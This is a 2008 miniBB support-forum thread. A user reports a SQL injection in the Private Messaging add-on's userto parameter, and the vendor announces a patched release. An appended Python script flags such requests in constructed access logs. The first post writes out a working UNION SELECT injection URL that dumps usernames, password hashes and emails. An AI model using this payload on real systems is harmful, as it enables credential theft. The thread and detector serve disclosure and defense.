miniBB Support Forums
pMail SQL Inj Bug (userto)
Guest #1 | Posted: 1 Dec 2008 23:11
Someone just showed me this in my forum.
/index.php?userto=%27%20union%20select%20concat_ws(0x3a,username,user_password,user_email,user_icq),2%20from%20table_use rs%20 where%20user_id%20=%201--%20f&step=sendmsg&action=pmail
This shows all the users' info. There is def. an SQL vuln with the userto variable and maybe more.
Any quick fix would help out?
Paul (CEO) #2 | Posted: 2 Dec 2008 03:03 | Edited by: Paul
Thank you for reporting this bug.
The Private Messaging add-on was first programmed in the era when vulnerabilities like this were not available at all. So I would agree, in some add-ons, errors like this may still be discovered, because I am unable to handle every possible hacking attempt. But due to the non-open-source nature of this add-on, they are discovered much slower than in default miniBB or free plugins.
I have updated the PM add-on in the customers area (version 2.3.2), so purchasers are welcome to re-download and update the addon_pmail.php file.
This topic is closed. New replies are not allowed.
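Added example, not part of the thread and not miniBB code: a check over web server access logs for requests like the one reported above, where the userto parameter of an action=pmail request carries quotes, SQL comment markers or a UNION SELECT. The log lines are constructed, and the combined log format, the function names and the heuristic pattern are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample in combined log format (assumed); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2009:10:00:01 +0000] "GET /index.php?action=pmail&step=sendmsg&userto=alice HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2009:10:02:44 +0000] "GET /index.php?userto=%27%20union%20select%201,2--%20f&step=sendmsg&action=pmail HTTP/1.1" 200 6010
192.0.2.10 - - [01/Jan/2009:10:05:12 +0000] "GET /index.php?action=vthread&forum=1&topic=7 HTTP/1.1" 200 9034
198.51.100.7 - - [01/Jan/2009:10:06:30 +0000] "GET /index.php?action=pmail&step=sendmsg&userto=%2527+UNION+SELECT+1,2 HTTP/1.1" 200 6010
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*"')
# Heuristic (assumption): a recipient name should not contain quotes,
# backslashes, SQL comment markers or a UNION ... SELECT sequence.
SUSPICIOUS_RE = re.compile(r"""['"\\]|--|/\*|\bunion\b.*\bselect\b""", re.I | re.S)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2527) is seen as '."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_pmail_requests(log_text):
    """Return (client, timestamp, decoded userto) for flagged pmail requests."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, when, target = match.groups()
        # parse_qs performs the first round of URL decoding.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "pmail" not in params.get("action", []):
            continue
        for raw in params.get("userto", []):
            value = fully_decode(raw)
            if SUSPICIOUS_RE.search(value):
                hits.append((client, when, value))
    return hits


if __name__ == "__main__":
    for client, when, value in suspicious_pmail_requests(SAMPLE_LOG):
        print(f"{when} {client} userto={value!r}")
```

A hit only shows that such a request was sent; whether data was returned depends on the add-on version that handled it.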